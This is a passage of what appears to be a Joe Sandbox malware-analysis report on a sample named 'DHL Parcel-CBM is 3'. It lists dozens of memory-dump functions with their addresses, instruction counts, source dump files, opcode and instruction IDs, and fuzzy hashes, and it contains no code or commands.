Instruction Fuzzy Hash: AAE09270C4A3589FCB81DFB888965AD7FB4DB0A211F2145EAD904E3362D2700A84CB51

Function 065CEF3A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5716ed59c52890e6b6212a5c644ef74527ce20d8d8a6b6578564789bbca23455
Instruction ID: 56684b8de15578ba38e17496fbbac4ed0bbc2ed4d742f932768aa63dc4aa1655
Opcode Fuzzy Hash: 5716ed59c52890e6b6212a5c644ef74527ce20d8d8a6b6578564789bbca23455
Instruction Fuzzy Hash: 6EF030309493459FC745CFA8D9819A8FFF4EB46324F24C2DAD8589B2E2C2355A42DB91

Function 069E5AF8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f40fe8b11345af10b25e9097e68b4ff689910c8b8d21473285e4cdf16e4f9b79
Instruction ID: b6c99a2a50adf480a7005cfab7901b28f591d94da12ce233d931b1782e8794d0
Opcode Fuzzy Hash: f40fe8b11345af10b25e9097e68b4ff689910c8b8d21473285e4cdf16e4f9b79
Instruction Fuzzy Hash: E2E09B34D04108DFD790DFB8D54075CBBF4DB48305F2481A9C81D97351DA324A41CB80

Function 069EA4C8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac9ff74b6355c098fdde2f9e73d6da11e9dd270056e921b2d4f104e5c603dd2d
Instruction ID: e1eead537af837563ad139ae7009890fe71c08c716ea7e0b4ca1f91a22c1c143
Opcode Fuzzy Hash: ac9ff74b6355c098fdde2f9e73d6da11e9dd270056e921b2d4f104e5c603dd2d
Instruction Fuzzy Hash: 11F0153490420CEFCB41CF98D8449ACBBB9EB48310F20C0AAED0857360D7329A61EF81

Function 069E59E1 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6413a20409676f37c2614d29e6f668da9626739b9ab6474e654f433791a8203
Instruction ID: 537d8bb6f1f76354795f2164dc9ba32990b3221827b24372cc585028d4c36141
Opcode Fuzzy Hash: b6413a20409676f37c2614d29e6f668da9626739b9ab6474e654f433791a8203
Instruction Fuzzy Hash: CDF03934904148EFC781DFA8D8816ACBBB5EF88315F24C0AADC5862390DA364B52EBC1

Function 027BC2B8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1726b615844bcb5516ab6899d347eb08b6ad8dcb70fbd9a64714430563140fdf
Instruction ID: 34057af6195321032f0377818e79f7bbc45c10a3841c782b7f55248d2161f03e
Opcode Fuzzy Hash: 1726b615844bcb5516ab6899d347eb08b6ad8dcb70fbd9a64714430563140fdf
Instruction Fuzzy Hash: 89F01534E04208EFCB81DFA8C840ADDBBF4EF48300F10C0AAA818A3350D6359A51DF80

Function 027B0D37 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11ec9595ca71ea6be1033e68f9987bd82f58e4a227b6acd211a9d266e721218
Instruction ID: 93f49695f7826113968c533ff0751ccdd96ea0576b04f6abb2b9a454b65cd093
Opcode Fuzzy Hash: b11ec9595ca71ea6be1033e68f9987bd82f58e4a227b6acd211a9d266e721218
Instruction Fuzzy Hash: 48E0D8342086545FC3024B3C98544547BB5EF4E61130543D6D545DB3A1EB289C459B11

Function 065EDEAA Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e618e01ddf8c3ad8b6b04fa2e2ed191cbcc38474361a645c445c3681d21449
Instruction ID: 326d9685481c73eee2156e0f17b14a0cb4dce91f4d9d3d77216c4070805416b0
Opcode Fuzzy Hash: 36e618e01ddf8c3ad8b6b04fa2e2ed191cbcc38474361a645c445c3681d21449
Instruction Fuzzy Hash: 1AF01230E05228CFEF98CF14E848B98B7B2BB08341F0085A4E54DA7344CBB598848F10

Function 069E96A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea2695726d40bb04c83c48b65f655ab561c831b32f1aefd2ece9cbe88221afc9
Instruction ID: b5b828771c6df550b4dfe57472804ca54665f808f4ec8c4dd7b2669266ec1df9
Opcode Fuzzy Hash: ea2695726d40bb04c83c48b65f655ab561c831b32f1aefd2ece9cbe88221afc9
Instruction Fuzzy Hash: 4AF0C934908208EFCB45DF94D8409ACBBB9EB48314F14C1AAED5856361D6369A51EF94

Function 069E66C8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80af347eacb14fc4641cd51f3880d5c4ee7be3f06881f521b87ebf1183ac6a74
Instruction ID: 5f184d343c0499b21672f171ae3a25b8331c8d98bbc548ca534a84e1734241df
Opcode Fuzzy Hash: 80af347eacb14fc4641cd51f3880d5c4ee7be3f06881f521b87ebf1183ac6a74
Instruction Fuzzy Hash: 76E0653480820CEBCF01CF94D8409ADBBBAEB48300F208099ED0423261C7329A61EF80

Function 069E42E8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f5457c156a6a23d9123d642297fb27f5cb065ff2c311906adcdc03461f20d6
Instruction ID: cb078b22d2ddc3b2a8ca1d11ad8566a45494b910fa3a78c4cd6c2c0326d6588a
Opcode Fuzzy Hash: d4f5457c156a6a23d9123d642297fb27f5cb065ff2c311906adcdc03461f20d6
Instruction Fuzzy Hash: EDE03934808108EFCB81DF98C5409ACFBF8AB48200F14C1AAAC5892251D6359A51EF90

Function 069E6F68 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80af347eacb14fc4641cd51f3880d5c4ee7be3f06881f521b87ebf1183ac6a74
Instruction ID: fe454da1dab83b73cd4b1fb8ed364c948f2e7f686a40eadd1d3211d0b6ac6d19
Opcode Fuzzy Hash: 80af347eacb14fc4641cd51f3880d5c4ee7be3f06881f521b87ebf1183ac6a74
Instruction Fuzzy Hash: 90E0653480820CFBCB41CF94DA409ADBFB9EB48301F208599ED0423261C7329A61EB80

Function 06A66000 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1662924c9da14b4118ea629d8b43f58099d3953161f2cf08a6e8c334326f42fd
Instruction ID: c53904780c20a9afa3fe8ea61f923763965c299594313e48e6b1b34522b5cbbb
Opcode Fuzzy Hash: 1662924c9da14b4118ea629d8b43f58099d3953161f2cf08a6e8c334326f42fd
Instruction Fuzzy Hash: 68E0ED74D04208EFCB84DFA9D440A9CFBF8EF48310F10C1B9A91893351D6359A51DF81

Function 06A6DDC0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1662924c9da14b4118ea629d8b43f58099d3953161f2cf08a6e8c334326f42fd
Instruction ID: 3ce68c65cfc40060704c57fd4e941e39a2cd48e97b6490a9d07df9a9673d6927
Opcode Fuzzy Hash: 1662924c9da14b4118ea629d8b43f58099d3953161f2cf08a6e8c334326f42fd
Instruction Fuzzy Hash: 7AE0ED74E05208EFCB84EFA9D480A9CFBF4EF48314F10C1A9A818A3350D6359E51DF80

Function 06A6A940 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1662924c9da14b4118ea629d8b43f58099d3953161f2cf08a6e8c334326f42fd
Instruction ID: f8ae238ada2340b13399b74f673fa06ad2e37ee1ce7f208ca30eb178bfbaac8b
Opcode Fuzzy Hash: 1662924c9da14b4118ea629d8b43f58099d3953161f2cf08a6e8c334326f42fd
Instruction Fuzzy Hash: 1EE0ED74D05208EFCB84DFA9D441A9CFBF4EF48314F20C1A9A918A3351D6369E51DF80

Function 0675EC60 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b9490c3582683a235f67f028030229ba79319edc485565561a6e8dfd06011a
Instruction ID: e3a3ca72d0ab19a57828019c2748678481991e6e763c7dd70a676fa21452a752
Opcode Fuzzy Hash: c3b9490c3582683a235f67f028030229ba79319edc485565561a6e8dfd06011a
Instruction Fuzzy Hash: 53E086317003145BEBE0A6645C1177936859B45611F6244E5DF15EF280DAE2E8418791

Function 069E1EB9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11366dbae4cd80f8bab5e4c590d87ab9e0a21b7e42f91ee6c145a9688a3afe05
Instruction ID: 9623ab900bde50fd2471725199066fb458fd6e5d42e0b5338611b96f27fd5598
Opcode Fuzzy Hash: 11366dbae4cd80f8bab5e4c590d87ab9e0a21b7e42f91ee6c145a9688a3afe05
Instruction Fuzzy Hash: A2E092349091489BC745CBB898417F8BFB8AB09114F2C41E8D88416642D6315E42CBD0

Function 069E2EF0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa9aff8399ff1a39d995f3aadbe1b604dc8b6bb0e665f56385b24edf6616e2
Instruction ID: 96165ecb597fbea4ac3d43b5c3351c337400b0b3b0f36b3bd96395d6ea3e5671
Opcode Fuzzy Hash: 70aa9aff8399ff1a39d995f3aadbe1b604dc8b6bb0e665f56385b24edf6616e2
Instruction Fuzzy Hash: C2E01A74E04208EFCB84DFA8D480AACFBF8EB48300F20C5A9981893351D6359F41EF80

Function 069EBA0A Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40930d22a7f62d438fe6b8308bf9d62a99b82daab9bd4d2d93d6ccfcb81d0835
Instruction ID: 42c4f92e9baca758d4f58bf120e85e3fbc5cc9fef7a629b91fae814b9193b839
Opcode Fuzzy Hash: 40930d22a7f62d438fe6b8308bf9d62a99b82daab9bd4d2d93d6ccfcb81d0835
Instruction Fuzzy Hash: 17E0D874904208EBD704DF94D9419ACFBB9EB44314F2081ADD80417351DA315D41DBC5

Function 069EAF00 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9237c5d64c8c737a1005bf5182c106d3cbe2e78429000a71084b10aef522990d
Instruction ID: 733c98cccc4823afce11bd1cf32e71534aeb1e3e34eeb89b966a220376f5b503
Opcode Fuzzy Hash: 9237c5d64c8c737a1005bf5182c106d3cbe2e78429000a71084b10aef522990d
Instruction Fuzzy Hash: F1E09A7490D248DFC745DFA4E8414A8BFB8AF86304F2485DDD988576A2C6364E42EB92

Function 069E3828 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379e2aa4261dfdb700ce9d4ccd791fc41bd781a8d4e8e4c0f1a6bb7ec45c61c0
Instruction ID: 2715dcf4e0296ce090c913fdfba03d5665ecd083ee351f29c19228b8333270d8
Opcode Fuzzy Hash: 379e2aa4261dfdb700ce9d4ccd791fc41bd781a8d4e8e4c0f1a6bb7ec45c61c0
Instruction Fuzzy Hash: 7BE09230C04208EFD784DBA4C4896ACBBB8AF45205F1880AD981457681CA314E82DBE1

Function 069E4C68 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f510651a0e11acad96706a9a0572d503bfcfe4897708e21c3feff1db9bae42d2
Instruction ID: 1826a90bd77d4c476443350f76c4914b35812c6cae5f8f5759f863cb435f63f5
Opcode Fuzzy Hash: f510651a0e11acad96706a9a0572d503bfcfe4897708e21c3feff1db9bae42d2
Instruction Fuzzy Hash: FEE0D834D04104EBCB00DF90D8406ACB7B5DB85301F14C599C90427390CA724E42CBC1

Function 027B0AF1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9903261a4e892280f4a9461e8681d0c969ecd3e0794d9ee02b37874c22da1e
Instruction ID: d9a709f651a49a19c5c7f38f8ae11fa451e148e88e00f8456db11ec4e8980dfb
Opcode Fuzzy Hash: 8b9903261a4e892280f4a9461e8681d0c969ecd3e0794d9ee02b37874c22da1e
Instruction Fuzzy Hash: F8E09AB0909248AFCB42DBB8E940AADBFB5EF8620571881E9E409D7243C6342A04AF40

Function 027B0D6F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cf8c695f03e1e863bf9fb88d134654d0a6f97c8b7381ae5066c3c076c522a4
Instruction ID: b3fe96c32909f69fb1b858b2d5a302501c769eb35bf0572676c69b290181ae06
Opcode Fuzzy Hash: 20cf8c695f03e1e863bf9fb88d134654d0a6f97c8b7381ae5066c3c076c522a4
Instruction Fuzzy Hash: 5BE0C2342086948FC3034778989899A7FFA9E4B15830842DBE54ADB7B2EA295C42DB61

Function 027B0D00 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f771ca3946d4d498fec5cb3f329ccd3602c0db1ad5df5a9293e13c4164132ad
Instruction ID: bae87ccf1587f08ddaf872c9670fe4e9d2b9acfba12896ff352c5b815f5ef264
Opcode Fuzzy Hash: 9f771ca3946d4d498fec5cb3f329ccd3602c0db1ad5df5a9293e13c4164132ad
Instruction Fuzzy Hash: C7D05E383406149FD304AB68E859B593BA9DF48B11F100165FA05CB3A1DA65EC014B91

Function 06A69EA0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a10ed3f239ea8cedd41dff2938bb609369cff9b1805d7bc39dbc2c5f2e68908f
Instruction ID: a10aa86aadd4e4bd9f1a55db6fff56f5c7d2a69e8274009bfc4142d31e0bd872
Opcode Fuzzy Hash: a10ed3f239ea8cedd41dff2938bb609369cff9b1805d7bc39dbc2c5f2e68908f
Instruction Fuzzy Hash: EFE0E574E04208EFCB84EFA9D5806ADBBF4FB49300F10C5A9981893350D6359A42DF80

Function 06A6BF28 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a10ed3f239ea8cedd41dff2938bb609369cff9b1805d7bc39dbc2c5f2e68908f
Instruction ID: 5178847f5947fb7f94478973297208b1cbaa46b0be620c8d66acce4b00f206bd
Opcode Fuzzy Hash: a10ed3f239ea8cedd41dff2938bb609369cff9b1805d7bc39dbc2c5f2e68908f
Instruction Fuzzy Hash: A1E0E574E04208EFCB84EFA9D4816ACBBF8EF48300F10C1E9A808D3391D6359A52DF80

Function 065E99E0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1ac82558be607193d04e62da931eae59b150b2e249e3dba8781ec6da2ff86b
Instruction ID: 150ead0060986bff9a11fb81b41dc1ede8cbdfcedd5b427db5b3355136760347
Opcode Fuzzy Hash: ea1ac82558be607193d04e62da931eae59b150b2e249e3dba8781ec6da2ff86b
Instruction Fuzzy Hash: 96E0E570D05208EFCB84DFA8D444AADBBF5AB48300F1081A99804A2350E6355A90DF80

Function 067597F8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea02ccf743f93163e8bac913a41bcb24c3dfa88691b7c7db216d242a04ec61d
Instruction ID: fe8d86aebe067391c4d7079c2907753ee8d9afc5711834b41445cbc91a339343
Opcode Fuzzy Hash: cea02ccf743f93163e8bac913a41bcb24c3dfa88691b7c7db216d242a04ec61d
Instruction Fuzzy Hash: 01E0E574E04208EFCB84DFA8D4806ACBBF4EB48300F14C1E9990893350D675AA42DF81

Function 067567E0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2547b6df84ed03371aa1294bdeca1ce07d05f66dd14e1e58446e43d3f028e781
Instruction ID: 2cae1c973159a730b175c5ac477b9b686ee2058876aabe78a1a433c521d20588
Opcode Fuzzy Hash: 2547b6df84ed03371aa1294bdeca1ce07d05f66dd14e1e58446e43d3f028e781
Instruction Fuzzy Hash: F8E0E570D05208EFCB94DFA8D444AADBBF5AB48300F50C5B99814A2360D7755A91DF91

Function 06758370 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea02ccf743f93163e8bac913a41bcb24c3dfa88691b7c7db216d242a04ec61d
Instruction ID: 47d79e112483b92da4fdc4acb4bd495d3f764d32dbea69404be0b24494aa0160
Opcode Fuzzy Hash: cea02ccf743f93163e8bac913a41bcb24c3dfa88691b7c7db216d242a04ec61d
Instruction Fuzzy Hash: ACE0E574E05208EFCB84DFA8D4806ACBBF8EB48300F14C1E9981893351D6759A41DF81

Function 06759083 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab601813997dcf06a8f575faf3176f0af8f63e942381b0be74390d3b166e8fea
Instruction ID: 52e71c912c912bb79f8483228b4972ddcccc17ec28fe64a0a3b5c15a2168a346
Opcode Fuzzy Hash: ab601813997dcf06a8f575faf3176f0af8f63e942381b0be74390d3b166e8fea
Instruction Fuzzy Hash: 29F0F874911119CFDB50DF68D84079CBBF2FB49300F1184A5D909A7244D7745E41CF42

Function 065C5ED1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9dfc8710b0d8b1c69d893e9356f58613bcac1b0f6e51e673922b176a25822d1
Instruction ID: 8822e8fbb4a6decefa5277c764398588a5a0838fa67eb68822effacb6633aa6c
Opcode Fuzzy Hash: a9dfc8710b0d8b1c69d893e9356f58613bcac1b0f6e51e673922b176a25822d1
Instruction Fuzzy Hash: 87D0C7B210A2A86EC70306B0BC2A0E33F249D039A131800CEE00A8E193D61218C0C350

Function 065CEF48 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b438c8bfe87d8606e8dfce12bcdfd918e145460832ee116e535a975c6f5137
Instruction ID: 2f6ca0b387088e7219b20074de48d78875c1f4f15cdbc97c6cea3aa75adf5e5d
Opcode Fuzzy Hash: b2b438c8bfe87d8606e8dfce12bcdfd918e145460832ee116e535a975c6f5137
Instruction Fuzzy Hash: 30E0E574E04208EFCB84DFA8D4816ACBBF8EB49310F10C1A9980893350D6359A42DF80

Function 065CB030 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b438c8bfe87d8606e8dfce12bcdfd918e145460832ee116e535a975c6f5137
Instruction ID: d2f710765c5ef724b8a8918b9dfeeda41f823e4413c81722b218394b742a6f3d
Opcode Fuzzy Hash: b2b438c8bfe87d8606e8dfce12bcdfd918e145460832ee116e535a975c6f5137
Instruction Fuzzy Hash: 90E0E574E04208EFCB84DFA8D5816ACBBF4FB48310F10C1A99828A3351D6759A41DF81

Function 069EA6E8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268a8001cb2d9747fda796ce6fd1fcf72c0dae1944f1bb84fda7774173a804b7
Instruction ID: 620f391f23fb30063f1ff413ab0fa7678b9d8a6390da7629366d97e272f3f4c6
Opcode Fuzzy Hash: 268a8001cb2d9747fda796ce6fd1fcf72c0dae1944f1bb84fda7774173a804b7
Instruction Fuzzy Hash: 2DE01A74D08208EFCB45DF98D4819ACFBB8EB48310F24C1AADD4453361D6369E51EF84

Function 069E5A78 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aacbce94650580bb261b8ba06bdd7e97dbbcaf3209c8c14faf6950465a5aa3b
Instruction ID: c857d9e8411324215e2ae375e56c876724f00ab566449e699d07538fb5ccdb10
Opcode Fuzzy Hash: 1aacbce94650580bb261b8ba06bdd7e97dbbcaf3209c8c14faf6950465a5aa3b
Instruction Fuzzy Hash: 91E08C78448018DBD694EBA4E980B69B7BCEB85319F289199981A53392DA724E02DAD0

Function 069E57B9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

